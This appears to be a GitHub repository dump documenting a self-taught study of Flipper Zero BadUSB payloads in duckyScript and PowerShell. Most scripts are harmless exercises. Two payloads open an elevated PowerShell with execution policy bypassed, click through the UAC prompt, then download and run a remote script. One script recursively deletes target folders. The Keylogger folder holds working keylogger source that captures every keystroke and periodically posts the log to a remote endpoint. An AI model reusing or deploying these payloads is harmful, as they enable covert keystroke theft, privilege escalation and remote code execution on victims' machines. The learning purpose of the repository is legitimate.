├── Powershell ├── deleteFile.ps1 └── nearbyNetworks.ps1 ├── KeystrokeInjection ├── printingText.txt ├── makingADirectory.txt ├── creatingFile.txt ├── readAndSteal.txt ├── refiningReadandSteal.txt └── deleteFile.txt ├── Wifi └── nearbyNetworks.txt ├── Keylogger └── keylogger.ps1 └── README.md /Powershell/deleteFile.ps1: -------------------------------------------------------------------------------- 1 | $targets = @('C:\GoodUSBTest', 'C:\CopyTest') 2 | 3 | foreach ($target in $targets) { 4 | Remove-Item -path $target -recurse 5 | } 6 | -------------------------------------------------------------------------------- /Powershell/nearbyNetworks.ps1: -------------------------------------------------------------------------------- 1 | # display the nearby networks using Write-Host 2 | 3 | $nearbyNetworks = netsh wlan show networks mode=Bssid 4 | 5 | $filteredNetworks = $nearbyNetworks | Select-String "SSID", "Authentication", "Encryption" 6 | 7 | Write-Host "Script #7 Running..." 8 | Write-Host "List of Nearby Networks:" 9 | Write-Host $filteredNetworks 10 | -------------------------------------------------------------------------------- /KeystrokeInjection/printingText.txt: -------------------------------------------------------------------------------- 1 | REM Script #1: Printing Text on Terminal 2 | REM Desc: Trying out Keystroke Injections 3 | REM Author: Ainsley Cabading 4 | REM Windows 10 PowerShell 5 | 6 | REM Opening Terminal 7 | GUI r 8 | DELAY 500 9 | STRING powershell 10 | ENTER 11 | DELAY 500 12 | 13 | REM ^ It's important to add delays in order to let the GUI load 14 | 15 | REM Doing the echo 16 | 17 | STRING echo Test #1 18 | ENTER 19 | -------------------------------------------------------------------------------- /KeystrokeInjection/makingADirectory.txt: -------------------------------------------------------------------------------- 1 | REM Script #2: Making a Directory 2 | REM Desc: Learning new Powershell Commands 3 | REM Author: Ainsley Cabading 4 | REM Meant for Windows 10 5 | 6 | REM Opening Terminal 7 | GUI r 8 | DELAY 500 9 | STRING powershell 10 | ENTER 11 | DELAY 500 12 | REM ^ It's important to add delays in order to let the GUI load 13 | 14 | REM Creating the directory 15 | 16 | STRING ni -Path C:\GoodUSBTest_1 -ItemType Directory 17 | ENTER 18 | DELAY 1000 19 | STRING echo Test#2_Completed 20 | ENTER 21 | -------------------------------------------------------------------------------- /KeystrokeInjection/creatingFile.txt: -------------------------------------------------------------------------------- 1 | REM Script #3: Making a Directory, Creating a File and Adding Text Content 2 | REM Desc: Trying to create more complicated scripts 3 | REM Author: Ainsley Cabading 4 | REM Meant for Windows 10 5 | 6 | REM Opening Terminal 7 | GUI r 8 | DELAY 500 9 | STRING powershell 10 | ENTER 11 | DELAY 500 12 | 13 | REM Creating the directory 14 | STRING ni -Path C:\GoodUSBTest -ItemType Directory 15 | ENTER 16 | DELAY 500 17 | 18 | REM Moving to created directory 19 | STRING cd C:\GoodUSBTest 20 | ENTER 21 | DELAY 500 22 | 23 | REM Creating the file 24 | STRING ni -Path C:\GoodUSBTest\Test1.txt -ItemType File 25 | ENTER 26 | DELAY 500 27 | 28 | REM Setting content inside file 29 | STRING Set-Content -Path .\Test1.txt -Value "Script#3 Works!" 30 | ENTER 31 | DELAY 500 32 | 33 | REM Checking if file exists 34 | STRING Test-Path .\Test1.txt 35 | ENTER 36 | DELAY 500 37 | 38 | REM Opening File 39 | STRING ii .\Test1.txt 40 | ENTER 41 | 42 | STRING echo Test#3_Completed 43 | ENTER 44 | -------------------------------------------------------------------------------- /Wifi/nearbyNetworks.txt: -------------------------------------------------------------------------------- 1 | REM Script #7: Discovering Nearby Wifi Networks 2 | REM Desc: Simple enumeration of nearby Wifi networks using Network Shell (netsh) 3 | REM Author: Ainsley Cabading 4 | REM Meant for Windows 10 5 | 6 | REM Running Powershell as an Admin 7 | GUI r 8 | DELAY 200 9 | STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "Start-Process powershell -ArgumentList '-NoProfile -ExecutionPolicy Bypass' -Verb RunAs" 10 | ENTER 11 | DELAY 1000 12 | SHIFT TAB 13 | DELAY 500 14 | ENTER 15 | DELAY 1500 16 | STRING cd C:\ 17 | ENTER 18 | 19 | REM Downloading the nearbyNetworks.ps1 from GitHub and running it 20 | STRING (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/aenslei/flipperZero-studies/main/Powershell/nearbyNetworks.ps1', 'C:\nearbyNetworks.ps1') 21 | ENTER 22 | DELAY 1000 23 | STRING .\nearbyNetworks.ps1 24 | ENTER 25 | 26 | REM Deleting the nearbyNetworks.ps1 27 | STRING Remove-Item -path nearbyNetworks.ps1 28 | ENTER 29 | DELAY 500 30 | 31 | REM Test Case 32 | STRING echo Script#7 Completed 33 | ENTER -------------------------------------------------------------------------------- /KeystrokeInjection/readAndSteal.txt: -------------------------------------------------------------------------------- 1 | REM Script #4: Read the content of a file and duplicate it to another folder 2 | REM Desc: Kinda like stealing the shadow or passwd file HEHE... but layman 3 | REM Author: Ainsley Cabading 4 | REM Meant for Windows 10 5 | 6 | REM Opening Terminal 7 | GUI r 8 | DELAY 500 9 | STRING powershell 10 | ENTER 11 | DELAY 500 12 | 13 | REM Checking if the target file exists 14 | STRING Test-Path C:\GoodUSBTest\Test1.txt 15 | ENTER 16 | 17 | REM Echoing file contents 18 | STRING Get-Content -Path C:\GoodUSBTest\Test1.txt 19 | ENTER 20 | DELAY 500 21 | 22 | REM Making a folder to place the duplicate in 23 | STRING New-Item -Path C:\CopyTest -ItemType Directory 24 | ENTER 25 | 26 | REM Duplicating file 27 | STRING Copy-Item -Path C:\GoodUSBTest\Test1.txt -Destination C:\CopyTest\CopiedTest1.txt 28 | ENTER 29 | 30 | REM Adding content of the duplicate and opening it 31 | STRING Add-Content -Path C:\CopyTest\CopiedTest1.txt -Value "This was copied!! Script#4 work :D good job" 32 | ENTER 33 | STRING ii -Path C:\CopyTest\CopiedTest1.txt 34 | ENTER 35 | 36 | STRING echo Test#4_Completed 37 | ENTER 38 | -------------------------------------------------------------------------------- /Keylogger/keylogger.ps1: -------------------------------------------------------------------------------- 1 | #Keylogger Powershell Script 2 | # For Testing - STANDCON 3 | 4 | Add-Type -TypeDefinition @' 5 | using System; 6 | using System.IO; 7 | using System.Runtime.InteropServices; 8 | public class KeyLogger { 9 | [DllImport("user32.dll")] 10 | public static extern int GetAsyncKeyState(int i); 11 | public static void Start() { 12 | string path = "C:\\Users\\Public\\keylog.txt"; 13 | while (true) { 14 | System.Threading.Thread.Sleep(100); 15 | for (int i = 8; i < 256; i++) { 16 | if (GetAsyncKeyState(i) == -32767) { 17 | File.AppendAllText(path, ((char)i).ToString()); 18 | } 19 | } 20 | } 21 | } 22 | } 23 | '@ -Language CSharp 24 | 25 | Start-Job -ScriptBlock { [KeyLogger]::Start() } 26 | 27 | while ($true) { 28 | if (Test-Path "C:\Users\Public\keylog.txt") { 29 | $logs = Get-Content "C:\Users\Public\keylog.txt" -Raw 30 | Invoke-RestMethod -Uri "" -Method Post -Body @{content=$logs} 31 | Clear-Content "C:\Users\Public\keylog.txt" 32 | } 33 | Start-Sleep -Seconds 20 34 | } 35 | -------------------------------------------------------------------------------- /KeystrokeInjection/refiningReadandSteal.txt: -------------------------------------------------------------------------------- 1 | REM Script #5: Refined readAndSteal.txt 2 | REM Desc: Refining the readAndSteal.txt script by refactoring it using DEFINE and VAR 3 | REM Author: Ainsley Cabading 4 | REM Meant for Windows 10 5 | 6 | REM Defining TargetFile, DupeFolder and Destination 7 | DEFINE #TARGET C:\GoodUSBTest\Test1.txt 8 | VAR $DUPE = C:\CopyTest 9 | 10 | REM Opening Terminal 11 | GUI r 12 | DELAY 500 13 | STRING powershell 14 | ENTER 15 | DELAY 500 16 | 17 | REM Checking if the target file exists 18 | STRING Test-Path #TARGET 19 | ENTER 20 | 21 | REM Echoing file contents 22 | STRING Get-Content -Path #TARGET 23 | ENTER 24 | DELAY 500 25 | 26 | REM Making a folder to place the duplicate in + Chagning DUPE into duplicateTextFile directory 27 | STRING New-Item -Path $DUPE -ItemType Directory 28 | ENTER 29 | DELAT 200 30 | VAR $DUPE = C:\CopyTest\CopiedTest1.txt 31 | 32 | REM Duplicating file 33 | STRING Copy-Item -Path #TARGET -Destination $DUPE 34 | ENTER 35 | 36 | REM Adding content of the duplicate and opening it 37 | STRING Add-Content -Path $DUPE -Value "This was copied!! Script#5 works. Learnt DEFINE and VAR duckyScript usage." 38 | ENTER 39 | STRING ii -Path $DUPE 40 | ENTER 41 | 42 | STRING echo Test#5_Completed 43 | ENTER 44 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # flipperZero-studies 2 | Learning how to create simple USB payloads using duckyScript and Powershell for the Flipper Zero! 3 | Documenting my self-led journey in learning how to write USB payloads. 4 | 5 | # Wifi 6 | Consists of all my Wifi-related duckyScripts. 7 | 8 | **Script #7**: nearbyNetworks.txt 9 | *A simple script that enumerates nearby Wifi networks.* 10 | 11 | # Powershell Basics and Keystroke Injection 12 | This first folder consists of all my attempts to master Powershell and Keystroke Injections on Windows machines 13 | 14 | **Script #6**: deleteFile.txt 15 | 16 | *Deletes a file using an externally downloaded Powershell script and deletes said script after. I learnt a LOT in this script.* 17 | 18 | **Script #5**: refiningReadAndDupe.txt 19 | *This was a failed experiment, unfortunately. I had no idea that the FZ BadUSB didn't take in DEFINE and VAR in duckyScript. Sad :(* 20 | 21 | **Script #4**: readAndDupe.txt 22 | *Read the content of a file and duplicate it to another folder.* 23 | 24 | **Script #3**: creatingFile.txt 25 | *Created a new directory, made a text file and added content into it before opening up.* 26 | 27 | **Script #2**: makingADirectory.txt 28 | *Also self explanatory.* 29 | 30 | **Script #1**: printingText.txt 31 | *Self explanatory. I got text echoed on a Powershell CLI.* 32 | -------------------------------------------------------------------------------- /KeystrokeInjection/deleteFile.txt: -------------------------------------------------------------------------------- 1 | REM Script #6: Deleting Folders 2 | REM Desc: Deleting Folders based on a target list. Learnt how to use SHIFT TAB and download and run a Powershell script from GitHub! 3 | REM Author: Ainsley Cabading 4 | REM Meant for Windows 10 5 | 6 | REM Running Powershell as an Admin 7 | GUI r 8 | DELAY 200 9 | STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "Start-Process powershell -ArgumentList '-NoProfile -ExecutionPolicy Bypass' -Verb RunAs" 10 | ENTER 11 | DELAY 1000 12 | SHIFT TAB 13 | DELAY 500 14 | ENTER 15 | DELAY 1500 16 | STRING cd C:\ 17 | ENTER 18 | 19 | REM If ExecutionPolicy Bypass does not work, you can use the base64 encoded version of the command. 20 | REM $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("powershell -NoProfile -ExecutionPolicy Bypass -Command `"Start-Process powershell -ArgumentList '-NoProfile -ExecutionPolicy Bypass' -Verb RunAs`"")) 21 | REM powershell.exe -EncodedCommand $encodedCommand 22 | 23 | REM Downloading the deleteFile.ps1 from GitHub and running it 24 | STRING (New-Object System.Net.WebClient).DownloadFile('https://github.com/aenslei/flipperZero-studies/raw/main/Powershell/deleteFile.ps1', 'C:\deleteFile.ps1') 25 | ENTER 26 | DELAY 1000 27 | STRING .\deleteFile.ps1 28 | ENTER 29 | 30 | REM Deleting the deleteFile.ps1 31 | STRING Remove-Item -path deleteFile.ps1 32 | ENTER 33 | DELAY 500 34 | 35 | REM Test Case 36 | STRING echo Script#6 Completed 37 | ENTER --------------------------------------------------------------------------------